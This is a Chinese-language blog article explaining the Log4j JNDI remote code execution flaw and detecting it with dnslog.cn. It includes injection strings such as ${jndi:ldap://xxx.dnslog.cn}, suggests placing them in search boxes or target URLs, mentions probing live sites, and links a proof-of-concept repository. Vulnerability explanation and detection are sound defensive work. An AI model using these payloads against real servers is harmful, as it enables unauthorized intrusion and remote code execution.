log4j RCE漏洞原理分析及检测

实现原理

log4j支持使用表达式的形式打印日志,比如

sh 复制代码
logger.info("system propety: ${sys:user.dir}");

问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题

sh 复制代码
logger.info("system propety: ${jndi:schema://url}");

jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。

因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。

那么问题来了,攻击者如何控制服务器上记录的日志内容呢?

非常简单! 大部分web服务程序都会对用户输入进行日志记录。例如:用户访问了哪些url,有哪些关键的输入等,都会被作为参数送到log4j中,我们在这些地方写上 ${jndi:ldap://http://xxx.dnslog.cn} 就可以使web服务从http://xxx.dnslog.cn下载字节流了

12月9日晚,漏洞刚爆出时,在百度、google的搜索框内输入攻击字符串,就可以进行攻击。不提供输入框也好办,在url中随便附上一段也可能成功: www.target.com?${jndi:schema://url}

现在各大网站都已经完成了紧急修复工作,比如在taobao上尝试探测,会被ali的waf阻拦。

漏洞检测

漏洞检测可以使用 http://www.dnslog.cn/ 协助进行。 dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。

漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 会将所有dns解析记录显示在网站上,点击refresh即可看到。

攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。

java 复制代码
private static final Logger LOG = LogManager.getLogger(Application.class);
LOG.info("${jndi:ldap://i3sicw.dnslog.cn}");

如果使用的log4j版本小于2.15就会复现

xml 复制代码
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

一个检测demo

https://gitee.com/ziy001/log4j-attack

运行后会在本机弹出计算器,说明客户端通过这个漏洞让服务端执行了某些代码。

相关推荐
ACGkaka_2 天前
Spring Boot实战(三十六)编写单元测试
spring boot·单元测试·log4j
forestsea14 天前
分布式日志治理:Log4j2自定义Appender写日志到RocketMQ
java·log4j·java-rocketmq
遥不可及~~斌16 天前
Spring Boot 项目日志系统全攻略:Logback、Log4j2、Log4j与SLF4J整合指南
spring boot·log4j·logback
weixin_4383354016 天前
SpringBoot依赖冲突引发的 log4j 日志打印问题及解决方法
spring boot·单元测试·log4j
我是坑货17 天前
maven的项目管理和构建生命周期
java·log4j·maven
凭君语未可1 个月前
详解Maven的主要生命周期
java·log4j·maven
WIN赢1 个月前
单元测试的编写
单元测试·log4j
zerohawk1 个月前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员1 个月前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
故事与他6451 个月前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache